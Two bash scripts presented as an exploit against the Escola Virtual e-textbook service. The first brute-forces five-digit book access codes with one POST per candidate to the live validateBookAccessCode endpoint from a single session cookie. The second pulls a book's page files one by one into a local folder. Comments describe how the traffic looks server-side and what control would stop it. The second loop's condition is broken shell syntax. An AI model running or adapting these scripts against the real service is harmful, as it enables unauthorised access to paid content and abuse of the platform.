Escola Virtual exploit that performs a brute-force attack against the web API
#!/bin/bash
# Enumerates 5-digit book access codes against the validateBookAccessCode
# endpoint used in the loop below: INPUT_BOOK counts up from 1 and one POST
# is sent per candidate, all from the same PHPSESSID session.
# Globals:
#   INPUT_BOOK    current candidate as an integer; advanced by increment()
#   STR_BOOK_ID   INPUT_BOOK left-padded with zeros to 5 characters; kept in
#                 step with INPUT_BOOK by increment()
#   INPUT_COOKIES PHPSESSID cookie value sent with every request (empty here;
#                 the script does nothing to check it was filled in)
INPUT_BOOK=1
STR_BOOK_ID="00001"
INPUT_COOKIES="" #PHPSESSID Cookie ID
#######################################
# Advance INPUT_BOOK by one and refresh STR_BOOK_ID with the new value
# left-padded with zeros to five characters (10000 and above are used as-is).
# Globals:   INPUT_BOOK (read, written), STR_BOOK_ID (written)
# Arguments: none
# Returns:   status of the arithmetic increment (non-zero only if the new
#            value is 0), as in the original
#######################################
increment() {
  ((INPUT_BOOK++))
  local pad
  if (( INPUT_BOOK < 10 )); then
    pad="0000"
  elif (( INPUT_BOOK < 100 )); then
    pad="000"
  elif (( INPUT_BOOK < 1000 )); then
    pad="00"
  elif (( INPUT_BOOK < 10000 )); then
    pad="0"
  else
    pad=""   # five or more digits: no padding needed
  fi
  STR_BOOK_ID="${pad}${INPUT_BOOK}"
}
# Main loop: one POST per candidate until INPUT_BOOK reaches 99999 (string
# comparison, so INPUT_BOOK is expected to hold a bare integer).
# Server-side this is a burst of POSTs to one endpoint from a single PHPSESSID
# whose accessCode values increase by one each time; a per-session or per-IP
# attempt limit on the code check is the control that stops this enumeration.
while [ $INPUT_BOOK != 99999 ]
do
echo $STR_BOOK_ID   # progress marker: the candidate about to be submitted
# The whole curl command line is assembled as one string and handed to eval,
# so INPUT_COOKIES and STR_BOOK_ID are re-parsed by the shell as part of the
# command rather than passed as data. The submitted accessCode is STR_BOOK_ID
# with a fixed ".02" suffix; curl's output (the JSON reply) goes straight to
# stdout and is not examined by the script.
CMD="curl 'https://library.escolavirtual.pt/librarystudent/validateBookAccessCode' -H 'Host: library.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://library.escolavirtual.pt/librarystudent/empty' -H 'Cookie: PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' --data 'accessCode=$STR_BOOK_ID.02'"
#echo $CMD
eval $CMD   # exit status of curl is not checked
echo ""     # blank line separating one reply from the next
increment   # advances INPUT_BOOK and STR_BOOK_ID together
done
#!/bin/bash
# Fetches the page assets (page<NNNN>.svgz) of one book from a known base URL,
# page by page, using an existing PHPSESSID session, and stores them under
# book/ in the working directory.
# Globals:
#   INPUT_BOOK        current page number as an integer; advanced by increment()
#   MAX_BOOK_PAGES    last page number to fetch
#   STR_BOOK_ID       INPUT_BOOK left-padded with zeros to 4 characters; kept
#                     in step with INPUT_BOOK by increment()
#   INPUT_COOKIES     PHPSESSID cookie value sent with every request (empty here)
#   BOOK_PUBLIC_PATH  base URL of the book; page URLs are built from it (empty here)
INPUT_BOOK=1
MAX_BOOK_PAGES=1
STR_BOOK_ID="0001"
INPUT_COOKIES="" #PHPSESSID Cookie ID
BOOK_PUBLIC_PATH="" #Public Book Web-based Path
#######################################
# Advance INPUT_BOOK by one and refresh STR_BOOK_ID with the new value
# left-padded with zeros to four characters (1000 and above are used as-is).
# Globals:   INPUT_BOOK (read, written), STR_BOOK_ID (written)
# Arguments: none
# Returns:   status of the arithmetic increment (non-zero only if the new
#            value is 0), as in the original
#######################################
increment() {
  ((INPUT_BOOK++))
  local pad
  if (( INPUT_BOOK < 10 )); then
    pad="000"
  elif (( INPUT_BOOK < 100 )); then
    pad="00"
  elif (( INPUT_BOOK < 1000 )); then
    pad="0"
  else
    pad=""   # four or more digits: no padding needed
  fi
  STR_BOOK_ID="${pad}${INPUT_BOOK}"
}
# Main loop: intended to fetch pages INPUT_BOOK .. MAX_BOOK_PAGES, one GET each.
# Server-side the requests differ only in the page number and all carry the
# same PHPSESSID, so they stand out as sequential enumeration of one book's
# assets from a single session; tying asset access to the viewer's entitlement
# (rather than to knowing the path) is the control that limits this.
while [ $INPUT_BOOK != ($MAX_BOOK_PAGES + 1) ]
do
echo $STR_BOOK_ID   # progress marker: the page about to be fetched
# The whole curl command line is assembled as one string and handed to eval,
# so BOOK_PUBLIC_PATH, STR_BOOK_ID and INPUT_COOKIES are re-parsed by the
# shell as part of the command rather than passed as data. The body is written
# with -o to book/<STR_BOOK_ID>.svgz; the book/ directory is not created here.
CMD="curl '$BOOK_PUBLIC_PATH/page$STR_BOOK_ID.svgz' -H 'Host: www.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Referer: $BOOK_PUBLIC_PATH/page$STR_BOOK_ID.xhtml' -H 'Cookie: ZDEDebuggerPresent=php,phtml,php3; PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' -o book/$STR_BOOK_ID.svgz"
#echo $CMD
eval $CMD   # exit status of curl is not checked
echo ""     # blank line separating one transfer's output from the next
increment   # advances INPUT_BOOK and STR_BOOK_ID together
done